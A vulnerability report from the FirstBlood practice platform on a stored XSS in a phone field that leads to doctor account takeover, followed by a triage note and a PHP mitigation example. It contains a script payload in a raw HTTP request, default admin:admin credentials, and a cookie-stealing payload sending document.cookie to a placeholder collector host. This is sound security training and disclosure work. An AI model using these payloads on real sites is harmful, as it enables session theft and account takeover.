FirstBlood-#1377 — Stored XSS on drpanel after joining hackerback can lead to account takeover
This issue was discovered on FirstBlood v3
On 2022-12-09, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing great today!
I found a stored XSS vulnerability on /api/hackerback.php. The phone parameter is reflected into the source code without being filtered or escaped correctly on /drpanel/index.php.
Possible cause:
The developers may have underestimated that the endpoint could also be invoked directly; initially, they only set an input field that accepts digits.
Impact:
I was able to execute JavaScript code on any doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.
Steps to reproduce:
1) First of all, you'll need to join the event. To do so, replicate the following request:
POST /api/hackerback.php HTTP/1.1
Host: <HOST>
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
full_name=xyz&phone=<script>alert(document.domain)</script>
2) Next, log in on /login.php and sign in with the default credentials admin:admin.
3) A popup should be displayed with the document's domain:
Now, since we're targeting authorized accounts, we can elevate our privileges by easily taking over the doctor's account as cookies are not set to be HTTPOnly. To do so, we could put the following payload in the phone parameter to steal and send the cookies back to us:
<script>location.href=`//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}`</script>
Next, visit the endpoint again: /drpanel/index.php
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation:
I highly recommend encoding any user input and validating it before reflecting it in the response.
Thanks for hosting such an awesome event again!
Kind regards,
0xblackbird
P1 CRITICAL
Endpoint: /api/hackerback.php
Parameter: phone
Payload: <script>alert(document.domain)</script>
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
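The three fixes the report and the triage note point at (server-side validation because input type "tel" is only a browser hint, output encoding before reflecting the value on the doctor panel, and an HttpOnly session cookie), shown together as an added PHP example. This is not FirstBlood's code; the function names and the request data are constructed for illustration, and the sample input is the payload quoted in the report.

```php
<?php
// Added example, not the FirstBlood source. Function names are assumptions.

// 1. Validate on the server. input type="tel" only constrains the browser's
//    form; a direct POST to /api/hackerback.php bypasses it entirely.
function validate_phone(string $raw): ?string
{
    $phone = trim($raw);
    // Optional leading "+" followed by 6 to 15 digits, nothing else.
    return preg_match('/^\+?[0-9]{6,15}$/', $phone) === 1 ? $phone : null;
}

// 2. Encode on output for the HTML context the value lands in. Do this even
//    for validated data, so a later relaxation of the validator cannot
//    reintroduce the stored XSS on /drpanel/index.php.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// 3. Keep the session cookie out of reach of document.cookie. Must run
//    before any output; the report notes the cookie lacked HttpOnly.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

start_hardened_session();

// Constructed request body, matching the one quoted in the report.
$request = ['full_name' => 'xyz', 'phone' => '<script>alert(document.domain)</script>'];

$phone = validate_phone($request['phone'] ?? '');
if ($phone === null) {
    http_response_code(400);
    echo "Invalid phone number\n";   // the report's payload is rejected here
} else {
    // persist $phone for the doctor panel ...
}

// Rendering on the doctor panel: a value that slipped into storage under the
// old code is still encoded, so the browser shows it as text, not a script.
$stored = '<script>alert(document.domain)</script>';
echo '<td>' . html($stored) . "</td>\n";
```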